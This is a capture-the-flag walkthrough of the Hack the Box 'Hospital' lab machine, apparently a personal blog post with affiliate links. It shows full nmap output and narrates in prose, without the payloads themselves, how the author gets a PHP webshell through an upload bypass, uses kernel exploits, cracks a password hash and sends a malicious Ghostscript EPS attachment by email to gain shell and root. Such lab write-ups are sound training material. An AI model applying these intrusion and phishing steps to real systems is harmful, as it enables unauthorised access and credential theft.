In this post, I would like to share a walkthrough of the Hospital Machine from Hack the Box
This room will be considered a medium machine on Hack the Box
What will you gain from the Hospital machine?
For the user flag, you must circumvent upload filters and deactivate functions to obtain a PHP webshell in the virtual machine and execute commands. I will elevate privileges using kernel exploits, demonstrating both CVE-2023-35001 and GameOver(lay). With root access on the web server, I’ll decrypt the password hashes for a user, acquiring credentials that are also effective on the Windows host and the RoundCube webmail. Within the email system, I’ll respond to another user anticipating an EPS file, exploiting a vulnerability in Ghostscript to achieve execution.
As for the root flag, you need to Automate processes designed for the Ghostscript phishing stage.
For those who want to learan or improve CyberSecurity skills especially Red Teaming and Blue Team, You can use the link https://affiliate.hackthebox.com/gnfp67dzy7p0 to support me
Academy link can be found https://affiliate.hackthebox.com/wanmohdariffwanmohdrosdi6259vvvInformation Gathering on Hospital Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
┌─[darknite@parrot]─[~/Documents/htb/hospital]
└──╼ $ nmap -sC -sV 10.10.11.241 -oA intial
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-19 06:28 EST
Nmap scan report for 10.10.11.241
Host is up (0.30s latency).
Not shown: 979 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA)
|_ 256 96c1dcd8972095e7015f20a24361cbca (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-19 18:28:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after: 2024-03-06T18:39:34
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-19T18:29:30+00:00
6646/tcp open msrpc Microsoft Windows RPC
8080/tcp open http Apache httpd 2.4.55 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-11-19T18:29:30
|_ start_date: N/A
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.04 seconds
┌─[darknite@parrot]─[~/Documents/htb/hospital]
└──╼ $ Let’s access the website interface
It has redirected to a login page
Therefore, let’s register the new account on the website
It required us to upload some files into the website interface
Let’s upload a random file to the website interface
However, it shows that the upload of a random file is a successful
The file I upload to the website can be readable to the public.
Firstly, we can upload a file that contains the content above on the website interface
Finally, we managed to retrieve the phpinfo
As a result, we can put a single-line
At last, we managed to obtain a command injection
As a result, we should inject the reverse shell on the website to retrieve the reverse shell connection
It will look something as shown above via Burp Suite
Finally, we have successfully obtained the shell connection on our attacker’s machine
We should execute the command above.
We notice that there’s a hash on drwilliams
Let’s start cracking the hashes
After a while, we have successfully obtained the password for drwilliams
We can change from root to drwilliams by using the credentials that we found earlier
Sadly, there is no user flag on the drwilliams home directory
After a while of thinking, I remembered that there’s another website where we are required to enter the credentials for the website. Surprisingly, it works as a charm
There’s one unread email that shows some vulnerability on GhostScript
Let’s download the script on our attacker’s machine
We should execute the Python script as shown above.
Let’s start our listener
Let’s replied the email with an attachment that will give us a connection back
After a while, we have obtained the shell as drbrown as shown above
We can read the user flag by typing the “type user.txt” command
Escalate to Root Privileges Access
Inside the xampp directory, we notice the permission as shown above
The file shown above lists the htaccess on the machine
As a result, we should upload the online line file to the machine
We can use the command above to see the privileges access. We can use the same file to execute the reverse shell connection back to us
Finally, we can successfully connect the reverse shell back to us.
We can read the root flag by typing the “type root.txt” command
Extra Information
